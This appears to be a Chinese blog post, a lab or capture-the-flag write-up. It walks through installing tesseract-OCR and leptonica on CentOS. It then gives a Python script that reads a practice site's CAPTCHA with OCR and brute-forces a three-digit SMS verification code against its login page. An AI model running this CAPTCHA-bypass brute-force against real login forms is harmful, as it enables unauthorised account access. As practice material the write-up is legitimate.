今天帮凉茶大哥看题,发现验证码识别,于是研究了一下
首先
1 |
pip install pytesseract |
发现脚本运行报错,然后开始装tesseract-OCR
准备工作:
编译环境: gcc gcc-c++ make(这个环境一般机器都具备,可以忽略)
1
yum install gcc gcc-c++ make
依赖的包: autoconf automake libtool libjpeg-devel libpng-devel libtiff-devel zlib-devel leptonica(1.67以上)
1. autoconf automake libtool libjpeg-devel libpng-devel libtiff-devel zlib-devel 可以通过yum安装:
1
yum install autoconf automake libtool
2
yum install libjpeg-devel libpng-devel libtiff-devel zlib-devel
2. leptonica 需要源码编译安装
参考资料:
http://paramountideas.com/tesseract-ocr-30-and-leptonica-installation-centos-55-and-opensuse-113
http://www.leptonica.org/source/README.html
下载leptonica 包: http://www.leptonica.org/source/leptonica-1.68.tar.gz
解压后切换到leptonica-1.68 根目录
1
./configure
2
make
3
make install
tesseract安装:
依赖安装完毕后开始安装tesseract
下载tesseract-3.01 安装包: http://tesseract-ocr.googlecode.com/files/tesseract-3.01.tar.gz
解压后切换到tesseract-3.01 根目录
(如果在make时遇到类似strngs.h:1: error: stray ‘\357’ in program 的错误,请将tesseract-3.01/ccutil/strngs.h 文件转为ANSI 编码保存,再重新编译)
1
./autogen.sh
2
./configure
3
make
4
make install
5
ldconfig
tesseract英文语言包安装:
下载tesseract-3.01 英文语言包: http://tesseract-ocr.googlecode.com/files/tesseract-ocr-3.01.eng.tar.gz
解压后将tesseract-ocr/tessdata 下的所有文件全部拷贝到/usr/local/share/tessdata 下
安装完毕.
测试一下:
切换到解压后的tesseract-3.01 根目录(这个目录下有一个自带的phototest.tif 可以做测试用)
命令行:
1
tesseract phototest.tif phototest -l eng
输出:
1
Tesseract Open Source OCR Engine v3.01 with Leptonica
2
Page 0
这时应该在当前目录生成一个phototest.txt 文本文件,内容就是phototest.tif 显示的文字.
装完了之后开始跑脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
#!/usr/bin/env python # -*- coding: utf_8 -*- # Date: 2016/6/10 try: import pytesseract from PIL import Image import requests except ImportError: print 'moulde import error,Please use pip install,pytesseract depend follow' print 'http://www.lfd.uci.edu/~gohlke/pythonlibs/#pil' print 'http://code.google.com/p/tesseract-ocr/' raise SystemExit header = {'Cookie': 'PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXx'} def vcode(): print 'python vcode recognize' pic_url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php' r = requests.get(pic_url, headers=header, timeout=10) with open('vcode.png', 'wb') as pic: pic.write(r.content) image=Image.open('vcode.png') im =pytesseract.image_to_string(image) print im print 'test3' im = im.replace(' ', '') if im != '': return im else: return vcode() try: print '\nScript number 11\n' for pwd in xrange(100, 999): code = vcode() url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php' payload = {'username': 13388886666, 'mobi_code': pwd, 'user_code': code} r = requests.post(url, data=payload, headers=header, timeout=10) response = unicode(r.content, 'utf-8').encode('gbk') if 'error' not in response: print 'Correct vcode is:', pwd, response break else: print 'Trying vcode:', pwd, code except KeyboardInterrupt: raise SystemExit('Already Exit!') |
运行,等待得到结果
问题解决,找凉茶大哥要红包。。。。。。